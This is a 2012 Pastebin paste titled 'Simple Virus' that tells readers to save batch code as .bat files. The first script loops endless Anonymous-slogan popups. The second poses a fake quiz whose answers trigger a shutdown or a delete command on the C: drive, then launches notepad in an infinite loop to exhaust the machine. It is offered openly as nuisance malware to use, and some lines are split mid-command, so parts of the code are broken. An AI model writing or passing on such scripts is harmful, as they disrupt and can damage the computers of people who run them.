Advertisement
k0zack

Simple Virus

Nov 6th, 2012
115
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
MySQL 1.60 KB | None | 0 0
  1. Firstly you must open notepad and than copy this code
  2.  
  3. 1.Pop-up Message
  4.  
  5. @ECHO off
  6. :
  7. Begin
  8. msg * Greetings world. We are anonymous, we are legion, we do not forgive, we do not forget. Expect us
  9. msg * We are anonymous, we are legion, we do not forgive, we do not forget. Expect us
  10. msg * We are anonymous, we are legion, we do not forgive, we do not forget. Expect us
  11. msg * We are anonymous, we are legion, we do not forgive, we do not forget. Expect us
  12. msg * We are anonymous, we are legion, we do not forgive, we do not forget. Expect us
  13. msg * Remember rememebr the fifth of november, gunpoweder treason and plot
  14. msg * bye!
  15. GOTO BEGIN
  16.  
  17. save as all files and save with .bat
  18.  
  19. 2.Another damn question
  20.  
  21. @echo off
  22. title today quiz :)
  23. :menu
  24. cls
  25. echo Greetings world. We are anonymous, we are legion, we do not forgive, we do not forget. Expect us. what will you do if your computer atacked by virus ?
  26. pause
  27. echo choose one:
  28. echo 1. Restar it
  29. echo 2. format my computer
  30. echo 3. let it be
  31. set input=nothing
  32. set /p input=Choice:
  33. if %input%==1 shutdown -s -t
  34. 30
  35. if %input%==2 del c:\xxx
  36. if %input%==3 @ECHO off
  37. msg * We are anonymous, we are legion, we do not forgive, we do not forget. Expect us
  38. msg * We are anonymous, we are legion, we do not forgive, we do not forget. Expect us
  39. msg * We are anonymous, we are legion, we do not forgive, we do not forget. Expect us
  40. msg * We are anonymous, we are legion, we do not forgive, we do not forget. Expect us
  41. msg * We are anonymous, we are legion, we do not forgive, we do not forget. Expect us
  42. @ECHO off
  43. :top
  44. START %SystemRoot%
  45. \system32\notepad.exe
  46. GOTO top
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement